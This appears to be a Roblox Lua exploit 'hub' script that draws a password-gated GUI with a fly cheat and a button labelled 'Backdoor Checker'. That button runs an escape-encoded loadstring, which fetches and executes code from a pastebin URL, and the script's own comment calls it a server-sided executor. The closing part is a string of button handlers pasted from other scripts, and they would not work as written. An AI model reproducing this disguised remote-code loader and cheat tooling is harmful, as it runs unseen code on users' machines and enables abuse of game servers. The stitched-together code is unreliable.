local Kakomo = Instance.new("ScreenGui")
local Lmao = Instance.new("Frame")
local ImageLabel = Instance.new("ImageLabel")
local TextButton = Instance.new("TextButton")
local TextBox = Instance.new("TextBox")
local Frame = Instance.new("Frame")
local homt = Instance.new("ImageLabel")
local Scripts = Instance.new("Frame")
local FlyE = Instance.new("TextButton")
local XLabel = Instance.new("ImageLabel")
local Fly = Instance.new("TextLabel")
local Backdoorchecker = Instance.new("TextButton")
local XLabel_2 = Instance.new("ImageLabel")
local Fly_2 = Instance.new("TextLabel")
local Credits = Instance.new("Frame")
local CreditLabel = Instance.new("TextLabel")
local Discord = Instance.new("Frame")
local TextBox_2 = Instance.new("TextBox")
local Home = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local ImageLabel_2 = Instance.new("ImageLabel")
local XLabel_3 = Instance.new("ImageLabel")
local Close = Instance.new("TextButton")
local ScrollingFrame = Instance.new("ScrollingFrame")
local Home_2 = Instance.new("ImageLabel")
local HomeButton = Instance.new("TextButton")
local Credits_2 = Instance.new("ImageLabel")
local CreditsButton = Instance.new("TextButton")
local Discord_2 = Instance.new("ImageLabel")
local DiscordButton = Instance.new("TextButton")
local Scripts_2 = Instance.new("ImageLabel")
local ScriptButton = Instance.new("TextButton")
local HomeLabel = Instance.new("TextLabel")
local CreditsLabel = Instance.new("TextLabel")
local DiscordLabel = Instance.new("TextLabel")
local ScriptsLabel = Instance.new("TextLabel")
 
Kakomo.Name = "Kakomo"
Kakomo.Parent = game.CoreGui
Kakomo.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
Kakomo.Draggable = true
Kakomo.Active = true


Lmao.Name = "Lmao"
Lmao.Parent = Kakomo
Lmao.BackgroundColor3 = Color3.new(1, 1, 1)
Lmao.BackgroundTransparency = 1
Lmao.BorderColor3 = Color3.new(0.105882, 0.164706, 0.207843)
Lmao.LayoutOrder = 1
Lmao.Position = UDim2.new(0.372363627, 0, 0.314049631, 0)
Lmao.Size = UDim2.new(0, 359, 0, 225)
Lmao.ZIndex = 9

ImageLabel.Parent = Lmao
ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
ImageLabel.BackgroundTransparency = 1
ImageLabel.Position = UDim2.new(0.224659532, -125, 0.0691703409, -25)
ImageLabel.Size = UDim2.new(0, 439, 0, 288)
ImageLabel.Image = "rbxassetid://605740338"
ImageLabel.ImageColor3 = Color3.new(0.0941177, 0.156863, 0.254902)
ImageLabel.ScaleType = Enum.ScaleType.Slice
ImageLabel.SliceCenter = Rect.new(24, 24, 216, 216)

TextButton.Parent = ImageLabel
TextButton.BackgroundColor3 = Color3.new(0.0666667, 1, 0)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.279428959, 0, 0.735330701, 0)
TextButton.Size = UDim2.new(0, 193, 0, 37)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "Login."
TextButton.TextColor3 = Color3.new(1, 1, 1)
TextButton.TextScaled = true
TextButton.TextSize = 14
TextButton.TextStrokeTransparency = 0
TextButton.TextWrapped = true

TextBox.Parent = ImageLabel
TextBox.BackgroundColor3 = Color3.new(0.32549, 0.32549, 0.32549)
TextBox.Position = UDim2.new(0.109418459, 0, 0.218972623, 0)
TextBox.Size = UDim2.new(0, 342, 0, 50)
TextBox.Font = Enum.Font.SourceSans
TextBox.Text = ""
TextBox.TextColor3 = Color3.new(1, 1, 1)
TextBox.TextScaled = true
TextBox.TextSize = 14
TextBox.TextStrokeColor3 = Color3.new(1, 0.933333, 0)
TextBox.TextStrokeTransparency = 0
TextBox.TextWrapped = true

Frame.Parent = Kakomo
Frame.BackgroundColor3 = Color3.new(1, 1, 1)
Frame.BackgroundTransparency = 1
Frame.Position = UDim2.new(0.179636344, 0, 0.214876026, 0)
Frame.Size = UDim2.new(0, 436, 0, 289)
Frame.Visible = false

homt.Name = "homt"
homt.Parent = Frame
homt.BackgroundColor3 = Color3.new(1, 1, 1)
homt.BackgroundTransparency = 1
homt.Position = UDim2.new(0.282500058, -125, 0.0846047774, -25)
homt.Size = UDim2.new(0, 439, 0, 288)
homt.Image = "rbxassetid://605740338"
homt.ImageColor3 = Color3.new(0.0941177, 0.156863, 0.254902)
homt.ScaleType = Enum.ScaleType.Slice
homt.SliceCenter = Rect.new(24, 24, 216, 216)

Scripts.Name = "Scripts"
Scripts.Parent = homt
Scripts.BackgroundColor3 = Color3.new(1, 1, 1)
Scripts.BackgroundTransparency = 1
Scripts.LayoutOrder = 1
Scripts.Position = UDim2.new(0.261958987, 0, 0.0169858932, 0)
Scripts.Size = UDim2.new(0, 317, 0, 274)
Scripts.Visible = false

FlyE.Name = "Fly 'E'"
FlyE.Parent = Scripts
FlyE.BackgroundColor3 = Color3.new(1, 1, 1)
FlyE.BackgroundTransparency = 1
FlyE.Position = UDim2.new(0.0473186113, 0, 0.0437956192, 0)
FlyE.Size = UDim2.new(0, 118, 0, 40)
FlyE.Font = Enum.Font.SourceSans
FlyE.TextColor3 = Color3.new(0, 0, 0)
FlyE.TextSize = 14
FlyE.MouseButton1Down:connect(function()
	repeat wait() 
	until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("HumanoidRootPart") and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") 
	local mouse = game.Players.LocalPlayer:GetMouse() 
	repeat wait() until mouse
	local plr = game.Players.LocalPlayer 
	local torso = plr.Character.HumanoidRootPart 
	local flying = true
	local deb = true 
	local ctrl = {f = 0, b = 0, l = 0, r = 0} 
	local lastctrl = {f = 0, b = 0, l = 0, r = 0} 
	local maxspeed = 50 
	local speed = 0 

	function Fly() 
		local bg = Instance.new("BodyGyro", torso) 
		bg.P = 9e4 
		bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) 
		bg.cframe = torso.CFrame 
		local bv = Instance.new("BodyVelocity", torso) 
		bv.velocity = Vector3.new(0,0.1,0) 
		bv.maxForce = Vector3.new(9e9, 9e9, 9e9) 
		repeat wait() 
			plr.Character.Humanoid.PlatformStand = true 
			if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then 
				speed = speed+.5+(speed/maxspeed) 
				if speed > maxspeed then 
					speed = maxspeed 
				end 
			elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then 
				speed = speed-1 
				if speed < 0 then 
					speed = 0 
				end 
			end 
			if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then 
				bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed 
				lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r} 
			elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then 
				bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed 
			else 
				bv.velocity = Vector3.new(0,0.1,0) 
			end 
			bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0) 
		until not flying 
		ctrl = {f = 0, b = 0, l = 0, r = 0} 
		lastctrl = {f = 0, b = 0, l = 0, r = 0} 
		speed = 0 
		bg:Destroy() 
		bv:Destroy() 
		plr.Character.Humanoid.PlatformStand = false 
	end 
	mouse.KeyDown:connect(function(key) 
		if key:lower() == "e" then 
			if flying then flying = false 
			else 
				flying = true 
				Fly() 
			end 
		elseif key:lower() == "w" then 
			ctrl.f = 1 
		elseif key:lower() == "s" then 
			ctrl.b = -1 
		elseif key:lower() == "a" then 
			ctrl.l = -1 
		elseif key:lower() == "d" then 
			ctrl.r = 1 
		end 
	end) 
	mouse.KeyUp:connect(function(key) 
		if key:lower() == "w" then 
			ctrl.f = 0 
		elseif key:lower() == "s" then 
			ctrl.b = 0 
		elseif key:lower() == "a" then 
			ctrl.l = 0 
		elseif key:lower() == "d" then 
			ctrl.r = 0 
		end 
	end)
	Fly()
end)


XLabel.Name = "X Label"
XLabel.Parent = FlyE
XLabel.BackgroundColor3 = Color3.new(1, 0.6, 0.6)
XLabel.BackgroundTransparency = 1
XLabel.BorderColor3 = Color3.new(0.207843, 0.207843, 0.207843)
XLabel.Position = UDim2.new(-0.00384745747, 0, -0.00600000098, 0)
XLabel.Size = UDim2.new(0, 117, 0, 41)
XLabel.Image = "rbxassetid://605740338"
XLabel.ImageColor3 = Color3.new(1, 0, 0)
XLabel.ScaleType = Enum.ScaleType.Slice
XLabel.SliceCenter = Rect.new(24, 24, 216, 216)

Fly.Name = "Fly"
Fly.Parent = FlyE
Fly.BackgroundColor3 = Color3.new(1, 1, 1)
Fly.BackgroundTransparency = 1
Fly.Position = UDim2.new(0.123271182, 0, -0.00599999726, 0)
Fly.Size = UDim2.new(0, 87, 0, 38)
Fly.Font = Enum.Font.SourceSans
Fly.Text = "Fly 'E'"
Fly.TextColor3 = Color3.new(0, 0, 0)
Fly.TextScaled = true
Fly.TextSize = 14
Fly.TextWrapped = true

Backdoorchecker.Name = "Backdoor checker"
Backdoorchecker.Parent = Scripts
Backdoorchecker.BackgroundColor3 = Color3.new(1, 1, 1)
Backdoorchecker.BackgroundTransparency = 1
Backdoorchecker.Position = UDim2.new(0.0441640392, 0, 0.449751794, 0)
Backdoorchecker.Size = UDim2.new(0, 117, 0, 37)
Backdoorchecker.Font = Enum.Font.SourceSans
Backdoorchecker.TextColor3 = Color3.new(0, 0, 0)
Backdoorchecker.TextSize = 14
Backdoorchecker.MouseButton1Down:connect(function()
	--[[
Server Sided executor by Novik#5516
Showcase: https://gyazo.com/bad0a3f43d89c59aef28bd2220c9ef79
Enjoy!
]]
	loadstring('\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\39\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\72\101\67\102\65\82\50\114\39\44\116\114\117\101\41\41\40\41')()
end)


XLabel_2.Name = "X Label"
XLabel_2.Parent = Backdoorchecker
XLabel_2.BackgroundColor3 = Color3.new(1, 0.6, 0.6)
XLabel_2.BackgroundTransparency = 1
XLabel_2.BorderColor3 = Color3.new(0.207843, 0.207843, 0.207843)
XLabel_2.Position = UDim2.new(-0.00384745747, 0, -0.00600000098, 0)
XLabel_2.Size = UDim2.new(0, 117, 0, 41)
XLabel_2.Image = "rbxassetid://605740338"
XLabel_2.ImageColor3 = Color3.new(1, 0, 0)
XLabel_2.ScaleType = Enum.ScaleType.Slice
XLabel_2.SliceCenter = Rect.new(24, 24, 216, 216)

Fly_2.Name = "Fly"
Fly_2.Parent = Backdoorchecker
Fly_2.BackgroundColor3 = Color3.new(1, 1, 1)
Fly_2.BackgroundTransparency = 1
Fly_2.Position = UDim2.new(0.123271182, 0, -0.00599999726, 0)
Fly_2.Size = UDim2.new(0, 87, 0, 38)
Fly_2.Font = Enum.Font.SourceSans
Fly_2.Text = "Backdoor Checker"
Fly_2.TextColor3 = Color3.new(0, 0, 0)
Fly_2.TextScaled = true
Fly_2.TextSize = 14
Fly_2.TextWrapped = true

Credits.Name = "Credits"
Credits.Parent = homt
Credits.BackgroundColor3 = Color3.new(1, 1, 1)
Credits.BackgroundTransparency = 1
Credits.Position = UDim2.new(0.27334851, 0, 0.010416667, 0)
Credits.Size = UDim2.new(0, 318, 0, 279)
Credits.Visible = false

CreditLabel.Name = "Credit Label"
CreditLabel.Parent = Credits
CreditLabel.BackgroundColor3 = Color3.new(1, 1, 1)
CreditLabel.BackgroundTransparency = 1
CreditLabel.Size = UDim2.new(0, 273, 0, 111)
CreditLabel.Font = Enum.Font.SourceSans
CreditLabel.Text = "Creator: Elmer#3662/Nev0#2813   Credits:???"
CreditLabel.TextColor3 = Color3.new(1, 1, 1)
CreditLabel.TextScaled = true
CreditLabel.TextSize = 14
CreditLabel.TextWrapped = true

Discord.Name = "Discord"
Discord.Parent = homt
Discord.BackgroundColor3 = Color3.new(1, 1, 1)
Discord.BackgroundTransparency = 1
Discord.Position = UDim2.new(0.271070629, 0, 0.013888889, 0)
Discord.Size = UDim2.new(0, 274, 0, 261)
Discord.Visible = false

TextBox_2.Parent = Discord
TextBox_2.BackgroundColor3 = Color3.new(0.819608, 0.819608, 0.819608)
TextBox_2.BackgroundTransparency = 0.20000000298023
TextBox_2.Size = UDim2.new(0, 200, 0, 50)
TextBox_2.ClearTextOnFocus = false
TextBox_2.Font = Enum.Font.SourceSans
TextBox_2.Text = "we dont have one now"
TextBox_2.TextColor3 = Color3.new(0, 0, 0)
TextBox_2.TextSize = 14

Home.Name = "Home"
Home.Parent = homt
Home.BackgroundColor3 = Color3.new(1, 1, 1)
Home.BackgroundTransparency = 1
Home.Position = UDim2.new(0.271070629, 0, 0.010416667, 0)
Home.Size = UDim2.new(0, 274, 0, 268)

TextLabel.Parent = Home
TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
TextLabel.BackgroundTransparency = 1
TextLabel.Position = UDim2.new(0.11678832, 0, 0.00373134343, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Kakomo HUB"
TextLabel.TextColor3 = Color3.new(1, 1, 1)
TextLabel.TextScaled = true
TextLabel.TextSize = 14
TextLabel.TextWrapped = true

TextLabel_2.Parent = Home
TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
TextLabel_2.BackgroundTransparency = 1
TextLabel_2.Position = UDim2.new(0.11678832, 0, 0.205223888, 0)
TextLabel_2.Size = UDim2.new(0, 200, 0, 50)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Free Hub. Discord at \"Discord Page\""
TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14
TextLabel_2.TextWrapped = true

ImageLabel_2.Parent = Home
ImageLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
ImageLabel_2.Position = UDim2.new(0.343065679, 0, 0.402985096, 0)
ImageLabel_2.Size = UDim2.new(0, 76, 0, 69)
ImageLabel_2.Image = "rbxassetid://2949511148"

XLabel_3.Name = "X Label"
XLabel_3.Parent = Frame
XLabel_3.BackgroundColor3 = Color3.new(1, 0.6, 0.6)
XLabel_3.BackgroundTransparency = 1
XLabel_3.BorderColor3 = Color3.new(0.207843, 0.207843, 0.207843)
XLabel_3.Position = UDim2.new(1.18614769, -125, 0.0815733373, -25)
XLabel_3.Size = UDim2.new(0, 45, 0, 44)
XLabel_3.Image = "rbxassetid://605740338"
XLabel_3.ImageColor3 = Color3.new(1, 0, 0)
XLabel_3.ScaleType = Enum.ScaleType.Slice
XLabel_3.SliceCenter = Rect.new(24, 24, 216, 216)

Close.Name = "Close"
Close.Parent = XLabel_3
Close.BackgroundColor3 = Color3.new(1, 1, 1)
Close.BackgroundTransparency = 1
Close.BorderColor3 = Color3.new(0.180392, 0.207843, 0.176471)
Close.Position = UDim2.new(-0.0136169791, 0, 0.0454545468, 0)
Close.Size = UDim2.new(0, 45, 0, 42)
Close.Font = Enum.Font.SciFi
Close.Text = "X"
Close.TextColor3 = Color3.new(0, 0, 0)
Close.TextScaled = true
Close.TextSize = 14
Close.TextWrapped = true

ScrollingFrame.Parent = Frame
ScrollingFrame.Active = true
ScrollingFrame.BackgroundColor3 = Color3.new(1, 1, 1)
ScrollingFrame.BackgroundTransparency = 1
ScrollingFrame.Position = UDim2.new(-0.00419721706, 0, 0, 0)
ScrollingFrame.Size = UDim2.new(0, 118, 0, 287)

Home_2.Name = "Home"
Home_2.Parent = ScrollingFrame
Home_2.BackgroundColor3 = Color3.new(1, 0.6, 0.6)
Home_2.BackgroundTransparency = 1
Home_2.BorderColor3 = Color3.new(0.207843, 0.207843, 0.207843)
Home_2.Position = UDim2.new(1.10950911, -125, 0.0487013981, -25)
Home_2.Size = UDim2.new(0, 95, 0, 39)
Home_2.Image = "rbxassetid://605740338"
Home_2.ImageColor3 = Color3.new(0.94902, 0.192157, 1)
Home_2.ScaleType = Enum.ScaleType.Slice
Home_2.SliceCenter = Rect.new(24, 24, 216, 216)

HomeButton.Name = "Home Button"
HomeButton.Parent = Home_2
HomeButton.BackgroundColor3 = Color3.new(1, 1, 1)
HomeButton.BackgroundTransparency = 1
HomeButton.Size = UDim2.new(0, 94, 0, 38)
HomeButton.Font = Enum.Font.SourceSans
HomeButton.Text = ""
HomeButton.TextColor3 = Color3.new(0, 0, 0)
HomeButton.TextSize = 14

Credits_2.Name = "Credits"
Credits_2.Parent = ScrollingFrame
Credits_2.BackgroundColor3 = Color3.new(1, 0.6, 0.6)
Credits_2.BackgroundTransparency = 1
Credits_2.BorderColor3 = Color3.new(0.207843, 0.207843, 0.207843)
Credits_2.Position = UDim2.new(1.10950911, -125, 0.142127007, -25)
Credits_2.Size = UDim2.new(0, 95, 0, 39)
Credits_2.Image = "rbxassetid://605740338"
Credits_2.ImageColor3 = Color3.new(0.94902, 0.192157, 1)
Credits_2.ScaleType = Enum.ScaleType.Slice
Credits_2.SliceCenter = Rect.new(24, 24, 216, 216)

CreditsButton.Name = "Credits Button"
CreditsButton.Parent = Credits_2
CreditsButton.BackgroundColor3 = Color3.new(1, 1, 1)
CreditsButton.BackgroundTransparency = 1
CreditsButton.Size = UDim2.new(0, 94, 0, 38)
CreditsButton.Font = Enum.Font.SourceSans
CreditsButton.Text = ""
CreditsButton.TextColor3 = Color3.new(0, 0, 0)
CreditsButton.TextSize = 14

Discord_2.Name = "Discord"
Discord_2.Parent = ScrollingFrame
Discord_2.BackgroundColor3 = Color3.new(1, 0.6, 0.6)
Discord_2.BackgroundTransparency = 1
Discord_2.BorderColor3 = Color3.new(0.207843, 0.207843, 0.207843)
Discord_2.Position = UDim2.new(1.10950911, -125, 0.240742922, -25)
Discord_2.Size = UDim2.new(0, 95, 0, 39)
Discord_2.Image = "rbxassetid://605740338"
Discord_2.ImageColor3 = Color3.new(0.94902, 0.192157, 1)
Discord_2.ScaleType = Enum.ScaleType.Slice
Discord_2.SliceCenter = Rect.new(24, 24, 216, 216)

DiscordButton.Name = "Discord Button"
DiscordButton.Parent = Discord_2
DiscordButton.BackgroundColor3 = Color3.new(1, 1, 1)
DiscordButton.BackgroundTransparency = 1
DiscordButton.Size = UDim2.new(0, 94, 0, 38)
DiscordButton.Font = Enum.Font.SourceSans
DiscordButton.Text = ""
DiscordButton.TextColor3 = Color3.new(0, 0, 0)
DiscordButton.TextSize = 14

Scripts_2.Name = "Scripts"
Scripts_2.Parent = ScrollingFrame
Scripts_2.BackgroundColor3 = Color3.new(1, 0.6, 0.6)
Scripts_2.BackgroundTransparency = 1
Scripts_2.BorderColor3 = Color3.new(0.207843, 0.207843, 0.207843)
Scripts_2.Position = UDim2.new(1.10950911, -125, 0.328978211, -25)
Scripts_2.Size = UDim2.new(0, 95, 0, 39)
Scripts_2.Image = "rbxassetid://605740338"
Scripts_2.ImageColor3 = Color3.new(0.94902, 0.192157, 1)
Scripts_2.ScaleType = Enum.ScaleType.Slice
Scripts_2.SliceCenter = Rect.new(24, 24, 216, 216)

ScriptButton.Name = "Script Button"
ScriptButton.Parent = Scripts_2
ScriptButton.BackgroundColor3 = Color3.new(1, 1, 1)
ScriptButton.BackgroundTransparency = 1
ScriptButton.Size = UDim2.new(0, 94, 0, 38)
ScriptButton.Font = Enum.Font.SourceSans
ScriptButton.Text = ""
ScriptButton.TextColor3 = Color3.new(0, 0, 0)
ScriptButton.TextSize = 14

HomeLabel.Name = "Home Label"
HomeLabel.Parent = ScrollingFrame
HomeLabel.BackgroundColor3 = Color3.new(1, 1, 1)
HomeLabel.BackgroundTransparency = 1
HomeLabel.Position = UDim2.new(0.1101695, 0, 0.00751336012, 0)
HomeLabel.Size = UDim2.new(0, 87, 0, 38)
HomeLabel.Font = Enum.Font.SourceSans
HomeLabel.Text = "Home"
HomeLabel.TextColor3 = Color3.new(0, 0, 0)
HomeLabel.TextScaled = true
HomeLabel.TextSize = 14
HomeLabel.TextWrapped = true

CreditsLabel.Name = "Credits Label"
CreditsLabel.Parent = ScrollingFrame
CreditsLabel.BackgroundColor3 = Color3.new(1, 1, 1)
CreditsLabel.BackgroundTransparency = 1
CreditsLabel.Position = UDim2.new(0.0762711912, 0, 0.0974787548, 0)
CreditsLabel.Size = UDim2.new(0, 87, 0, 38)
CreditsLabel.Font = Enum.Font.SourceSans
CreditsLabel.Text = "Credits"
CreditsLabel.TextColor3 = Color3.new(0, 0, 0)
CreditsLabel.TextScaled = true
CreditsLabel.TextSize = 14
CreditsLabel.TextWrapped = true

DiscordLabel.Name = "Discord Label"
DiscordLabel.Parent = ScrollingFrame
DiscordLabel.BackgroundColor3 = Color3.new(1, 1, 1)
DiscordLabel.BackgroundTransparency = 1
DiscordLabel.Position = UDim2.new(0.1101695, 0, 0.197824761, 0)
DiscordLabel.Size = UDim2.new(0, 87, 0, 38)
DiscordLabel.Font = Enum.Font.SourceSans
DiscordLabel.Text = "Discord"
DiscordLabel.TextColor3 = Color3.new(0, 0, 0)
DiscordLabel.TextScaled = true
DiscordLabel.TextSize = 14
DiscordLabel.TextWrapped = true

ScriptsLabel.Name = "Scripts Label"
ScriptsLabel.Parent = ScrollingFrame
ScriptsLabel.BackgroundColor3 = Color3.new(1, 1, 1)
ScriptsLabel.BackgroundTransparency = 1
ScriptsLabel.Position = UDim2.new(0.1101695, 0, 0.286060065, 0)
ScriptsLabel.Size = UDim2.new(0, 87, 0, 38)
ScriptsLabel.Font = Enum.Font.SourceSans
ScriptsLabel.Text = "Scripts"
ScriptsLabel.TextColor3 = Color3.new(0, 0, 0)
ScriptsLabel.TextScaled = true
ScriptsLabel.TextSize = 14
ScriptsLabel.TextWrapped = true

script.Parent.MouseButton1Click:Connect(function()
	if script.Parent.Parent.TextBox.Text == "gay" then ---- edit test with your code
		script.Parent.Parent.Parent.Parent.Frame.Visible = true
		wait(0)
		script.Parent.Parent.Parent.Visible = false
	end
end)

local ms = game.Players.LocalPlayer:GetMouse()

local btn = script.Parent
local sample = script:WaitForChild('Sample')

btn.MouseButton1Click:Connect(function()
	local c = sample:Clone()
	c.Parent = btn
	local x, y = (ms.X - c.AbsolutePosition.X), (ms.Y - c.AbsolutePosition.Y)
	c.Position = UDim2.new(0, x, 0, y)
	local len, size = 0.35, nil
	if btn.AbsoluteSize.X >= btn.AbsoluteSize.Y then
		size = (btn.AbsoluteSize.X * 1.5)
	else
		size = (btn.AbsoluteSize.Y * 1.5)
	end
	c:TweenSizeAndPosition(UDim2.new(0, size, 0, size), UDim2.new(0.5, (-size / 2), 0.5, (-size / 2)), 'Out', 'Quad', len, true, nil)
	for i = 1, 10 do
		c.ImageTransparency = c.ImageTransparency + 0.05
		wait(len / 12)
	end
	c:Destroy()
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.Frame.Visible = false
end)

script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Parent.homt.Home.Visible = true
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Discord.Visible = false
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Scripts.Visible = false
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Credits.Visible = false
end)


script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Credits.Visible = true
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Home.Visible = false
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Discord.Visible = false
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Scripts.Visible = false
end)


script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Parent.homt.Discord.Visible = true
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Home.Visible = false
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Scripts.Visible = false
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Credits.Visible = false
end)


script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Parent.homt.Scripts.Visible = true
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Home.Visible = false
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Discord.Visible = false
end)

script.Parent.MouseButton1Click:Connect(function()
	script.Parent.Parent.Parent.Parent.homt.Credits.Visible = false
end)

